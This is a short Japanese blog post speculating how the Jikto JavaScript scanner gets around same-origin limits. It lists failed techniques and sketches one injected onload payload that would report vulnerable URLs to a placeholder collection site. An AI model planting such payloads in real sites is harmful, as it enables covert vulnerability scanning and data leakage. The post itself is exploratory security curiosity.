どうやって JavaScript でクロスドメインなリクエストを投げてレスポンス取ってるんだろ。Jikto ね。
　とりあえず試したこと。
　

• Script タグの src で GET リクエスト代わりに読んでみる（Document.CreateElement して Document.Body あたりに AppendChild する）
  • とりあえず読み込みはできてるんだけど、スクリプトとして解釈できなくてエラー
  • っつうか、 Script src で読んだスクリプトのそのものにアクセスできねえ？　Document.all.Script.InnerText みたいなアクセスはムリ？　あとでためそう。
• フォーム作ってポストするとき Target を _new とかにしてみる
  • 子ウインドウにならなさげ。なってもたぶん読めない。
• Window.Open で子ウインドウつくってナビゲート
  • クロスドメインの壁に阻まれて中身が読めない = 結果が取れない
• フレーム/インラインフレームに Post してみる
  • クロスドメインの壁に阻まれて中身が読めない = 結果が取れない
• new ActiveXObject で InternetExplorer.Application
  • ローカルから起動したら動くけどインターネットゾーンじゃダメ

　
　あーもう気になって仕事になりゃしねえヽ(｀д´)ノ
　
　Post するテストパターンでたとえば onload="document.url='http://収集用サイト/収集.cgi?表示したURL'" みたいなことをしてやればいいのか？　たしかにこれなら問題のあるサイトの URL を収集できる。
　直接アクセスさせないと、たとえば串刺したりした場合に「串サイトから大量のスキャンが!!!!11234567u8ijhgfdsewasdn」なことになるので意味なさげ。どういう意味かは知らんが。
　ってことはクライアントから直でアクセスさせてるはず。
　
　うーん。テストパターンが反応したら、テストパターンそのものの動作で収集用のサイトに反応した URL を投げる、ってことで済んでたりするのか・・・？
　まさかそんな単純なオチじゃなかろう。いやそのやりかたでもたぶんできるんだけど。
　
　ただ、どっちにしろ一度はスキャン先のページ（っつうかフォームとか）を読まないとテストパターンの投げ先がわからんはずなんだが。